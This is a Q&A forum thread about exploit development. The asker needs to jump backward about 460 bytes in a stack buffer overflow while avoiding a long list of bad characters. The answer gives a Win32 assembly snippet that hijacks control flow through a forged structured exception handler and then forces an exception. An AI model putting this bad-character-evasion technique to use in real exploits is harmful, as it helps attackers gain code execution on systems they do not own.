0
votes

Update: Since I'm able to get the correct address into a register that I want to jump/call to, I think the best option would be to figure out a way to have self modifying code result in a jmp/call register. Ex. FFD6 call esi Would anyone be able to give me some pointers or an example in assembly of how to get a resulting FFD6?

I'm messing around with an exploit, and having a hard time moving backwards in the stack due to bad characters. I need to move back ~460 bytes to get to the start of my buffer.

Here is a list of the bad characters:

\x0a\x0d\x1a\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

I'm limited to x86\alpha_mixed with a couple exceptions like x81 & x8d. The only way I've been able to move back in the stack is \x74\x81 (which are allowed characters), but I'd have to do that 4 times to get back the ~460. That wouldn't be the biggest deal, except that will also make it very difficult for me to segment my shellcode when I'm already having to encode it to alpha_mixed.

I'm not an assembly master, so is there any other way that I'm missing that I might be able to move directly back without jmp or call (FF)?

1
Self modifying code allowed? - Jester
Yes, as long as it doesn't have any bad characters. I was working on a list of bad characters when I think I found my solution: omlette egghunter. That should allow me to jump and combine the pieces of my shellcode - PaulthePirate
By the way, why is \x81 allowed? What are the list of bad characters then? :) - Jester
@Jester Yeah, I know. I've just been trying to use alpha_mixed to be safe. There are some random, normally bad characters that do seem to be working. \x81 & \x8d work. \x00 still allows for characters afterwords as well. I've edited my original post with a list of bad characters. - PaulthePirate
@Jester I tried to encode E92FFEFFFF jmp dword 0xfffffe34 with msfvenom into x86/alpha_mixed but it gave me a 695 byte shellcode that is obviously way too long. Other than doing it manually, is there a more efficient way? I'm able to get a correct memory address of where I want to jump into a register using good characters, but having problems finding opcodes that aren't bad characters to use the register with. - PaulthePirate

1 Answers

2
votes

I have a working solution, but it's for Windows only and is based on a few other assumptions.

It's not totally optimized, I guess there are better ways to do parts of this...

; ASSUMPTIONS:
;   Platform is Win32
;   ESI contains address to be jumped to
;   All characters except for 00 and the ones you listed above are allowed
;   The contents of the registers after the jump don't matter
; BASIC METHOD:
;   1) Set up a structured exception handler pointing to your target address
;   2) Cause an exception

; Get zero into EAX and EDX
00401000      B8 11111111   MOV EAX, 11111111
00401005      35 11111111   XOR EAX, 11111111
0040100A      50            PUSH EAX
0040100B      5A            POP EDX

; First part of the SEH: Push target address
0040100C      56            PUSH ESI

; Second part of the SEH: Read FS:[0] and push it
0040100D      64:0310       ADD EDX, FS:[EAX]
00401010      52            PUSH EDX

; Get zero into EDX again
00401011      50            PUSH EAX
00401012      5A            POP EDX

; Write new SEH pointer into FS:[0]
00401013      64:2110       AND FS:[EAX], EDX
00401016      64:0120       ADD FS:[EAX], ESP

; Trigger exception (writing to memory at address zero)
00401019      0110          ADD [EAX], EDX